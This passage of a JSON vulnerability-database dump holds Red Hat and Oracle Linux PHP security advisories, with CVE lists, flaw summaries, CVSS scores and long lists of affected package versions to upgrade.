CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2783,\nCVE-2015-3307, CVE-2015-3329)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA heap buffer overflow flaw was found in PHP's regular expression\nextension. An attacker able to make PHP process a specially crafted regular\nexpression pattern could cause it to crash and possibly execute arbitrary\ncode. (CVE-2015-2305)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA use-after-free flaw was found in PHP's phar (PHP Archive) extension.\nAn attacker able to trigger certain error condition in phar archive\nprocessing could possibly use this flaw to disclose certain portions of\nserver memory. (CVE-2015-2301)\n\nAn ouf-of-bounds read flaw was found in the way the File Information\n(fileinfo) extension processed certain Pascal strings. A remote attacker\ncould cause a PHP application to crash if it used fileinfo to identify the\ntype of the attacker-supplied file. (CVE-2014-9652)\n\nIt was found that PHP move_uploaded_file() function did not properly handle\nfile names with a NULL character. A remote attacker could possibly use this\nflaw to make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348)\n\nA flaw was found in the way PHP handled malformed source files when running\nin CGI mode. A specially crafted PHP file could cause PHP CGI to crash.\n(CVE-2014-9427)\n\nThe following security issue was fixed in the php54-php-pecl-zendopcache\ncomponent:\n\nA use-after-free flaw was found in PHP's OPcache extension. This flaw could\npossibly lead to a disclosure of a portion of the server memory.\n(CVE-2015-1351)\n\nAll php54 users are advised to upgrade to these updated packages, which\ncorrect these issues. After installing the updated packages, the httpd\nservice must be restarted for the update to take effect.\n", "reporter": "RedHat", "published": "2015-06-04T04:00:00", "type": "redhat", "title": "(RHSA-2015:1066) Important: php54 security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-8142", "CVE-2014-9427", "CVE-2014-9652", "CVE-2014-9705", "CVE-2014-9709", "CVE-2015-0231", "CVE-2015-0232", "CVE-2015-0273", "CVE-2015-1351", "CVE-2015-2301", "CVE-2015-2305", "CVE-2015-2348", "CVE-2015-2783", "CVE-2015-2787", "CVE-2015-3307", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-3411", "CVE-2015-3412", "CVE-2015-4147", "CVE-2015-4148", "CVE-2015-4599", "CVE-2015-4600", "CVE-2015-4601", "CVE-2015-4602", "CVE-2015-4603", "CVE-2015-4604", "CVE-2015-4605", "CVE-2015-8935"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-13T01:28:17", "id": "RHSA-2015:1066", "href": "https://access.redhat.com/errata/RHSA-2015:1066", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:42:05", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-pdo-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-common-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-snmp-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "x86_64", "packageFilename": "php55-scldevel-2.0-1.el7.x86_64.rpm", "packageName": "php55-scldevel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-bcmath-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-opcache-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-opcache", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-xml-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-dba-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-odbc-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-process-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "x86_64", "packageFilename": "php55-runtime-2.0-1.el6.x86_64.rpm", "packageName": "php55-runtime", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-cli-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-mbstring-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-enchant-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-ldap-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-mbstring-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "src", "packageFilename": "php55-2.0-1.el7.src.rpm", "packageName": "php55", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-pgsql-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-xml-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-pgsql-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-common-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-ldap-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-gd-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "x86_64", "packageFilename": "php55-2.0-1.el6.x86_64.rpm", "packageName": "php55", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-pspell-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-xmlrpc-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "src", "packageFilename": "php55-php-5.5.21-2.el7.src.rpm", "packageName": "php55-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "x86_64", "packageFilename": "php55-runtime-2.0-1.el7.x86_64.rpm", "packageName": "php55-runtime", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-devel-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-intl-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-intl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-mysqlnd-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-mysqlnd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "src", "packageFilename": "php55-2.0-1.el6.src.rpm", "packageName": "php55", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-cli-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-tidy-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-tidy", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "src", "packageFilename": "php55-php-5.5.21-2.0.1.el6.src.rpm", "packageName": "php55-php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-xmlrpc-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "2.0-1.el7", "arch": "x86_64", "packageFilename": "php55-2.0-1.el7.x86_64.rpm", "packageName": "php55", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-pspell-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-bcmath-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-recode-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-process-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-enchant-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.0-1.el6", "arch": "x86_64", "packageFilename": "php55-scldevel-2.0-1.el6.x86_64.rpm", "packageName": "php55-scldevel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-soap-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-fpm-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-fpm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-mysqlnd-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-mysqlnd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-devel-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-dba-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-dba", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-recode-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-odbc-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-intl-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-intl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-gmp-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-gmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-gd-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-pdo-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-opcache-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-opcache", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-gmp-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-gmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-imap-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-imap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-soap-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.5.21-2.0.1.el6", "arch": "x86_64", "packageFilename": "php55-php-fpm-5.5.21-2.0.1.el6.x86_64.rpm", "packageName": "php55-php-fpm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "5.5.21-2.el7", "arch": "x86_64", "packageFilename": "php55-php-snmp-5.5.21-2.el7.x86_64.rpm", "packageName": "php55-php-snmp", "operator": "lt"}], "description": "php55\n[2.0-1]\n- fix incorrect selinux contexts #1194336\nphp55-php\n[5.5.21-2.0.1]\n- add dtrace-utils as build dependency\n[5.5.21-2]\n- core: fix use-after-free vulnerability in the\n process_nested_data function (unserialize) CVE-2015-2787\n- core: fix NUL byte injection in file name argument of\n move_uploaded_file() CVE-2015-2348\n- date: fix use after free vulnerability in unserialize()\n with DateTimeZone CVE-2015-0273\n- enchant: fix heap buffer overflow in\n enchant_broker_request_dict() CVE-2014-9705\n- ereg: fix heap overflow in regcomp() CVE-2015-2305\n- opcache: fix use after free CVE-2015-1351\n- phar: fix use after free in phar_object.c CVE-2015-2301\n- pgsql: fix NULL pointer dereference CVE-2015-1352\n- soap: fix type confusion through unserialize #1204868\n[5.5.21-1]\n- rebase to PHP 5.5.21\n[5.5.20-1]\n- rebase to PHP 5.5.20 #1057089\n- fix package name in description\n- php-fpm own session and wsdlcache dir\n- php-common doesn't provide php-gmp", "edition": 3, "reporter": "Oracle", "published": "2016-02-04T00:00:00", "title": "php55 security and bug fix update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2014-9427", "CVE-2015-1352", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-2305", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4148", "CVE-2015-4147", "CVE-2015-4600", "CVE-2014-9652", "CVE-2015-1351", "CVE-2015-4599", "CVE-2015-0231"], "modified": "2016-02-04T00:00:00", "id": "ELSA-2015-1053", "href": "http://linux.oracle.com/errata/ELSA-2015-1053.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:41:18", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-enchant-5.3.3-46.el6_6.i686.rpm", "packageName": "php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-snmp-5.3.3-46.el6_6.i686.rpm", "packageName": "php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-cli-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-devel-5.3.3-46.el6_6.i686.rpm", "packageName": "php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-snmp-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-snmp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-fpm-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-fpm", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-tidy-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-tidy", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-ldap-5.3.3-46.el6_6.i686.rpm", "packageName": "php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-embedded-5.3.3-46.el6_6.i686.rpm", "packageName": "php-embedded", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-soap-5.3.3-46.el6_6.i686.rpm", "packageName": "php-soap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-recode-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-enchant-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-enchant", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-embedded-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-embedded", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-pgsql-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-pgsql-5.3.3-46.el6_6.i686.rpm", "packageName": "php-pgsql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-imap-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-imap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-gd-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-odbc-5.3.3-46.el6_6.i686.rpm", "packageName": "php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-xmlrpc-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-mysql-5.3.3-46.el6_6.i686.rpm", "packageName": "php-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-odbc-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-odbc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-common-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-xmlrpc-5.3.3-46.el6_6.i686.rpm", "packageName": "php-xmlrpc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-process-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-devel-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-mbstring-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-bcmath-5.3.3-46.el6_6.i686.rpm", "packageName": "php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-pspell-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-ldap-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-ldap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-intl-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-intl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-zts-5.3.3-46.el6_6.i686.rpm", "packageName": "php-zts", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-pdo-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-mbstring-5.3.3-46.el6_6.i686.rpm", "packageName": "php-mbstring", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-bcmath-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-bcmath", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageFilename": "php-mysql-5.3.3-46.el6_6.x86_64.rpm", "packageName": "php-mysql", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-xml-5.3.3-46.el6_6.i686.rpm", "packageName": "php-xml", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-cli-5.3.3-46.el6_6.i686.rpm", "packageName": "php-cli", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-5.3.3-46.el6_6.i686.rpm", "packageName": "php", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-imap-5.3.3-46.el6_6.i686.rpm", "packageName": "php-imap", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-process-5.3.3-46.el6_6.i686.rpm", "packageName": "php-process", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-common-5.3.3-46.el6_6.i686.rpm", "packageName": "php-common", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-recode-5.3.3-46.el6_6.i686.rpm", "packageName": "php-recode", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-pspell-5.3.3-46.el6_6.i686.rpm", "packageName": "php-pspell", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-gd-5.3.3-46.el6_6.i686.rpm", "packageName": "php-gd", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-pdo-5.3.3-46.el6_6.i686.rpm", "packageName": "php-pdo", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageFilename": "php-intl-5.3.3-46.el6_6.i686.rpm", "packageName": "php-intl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": 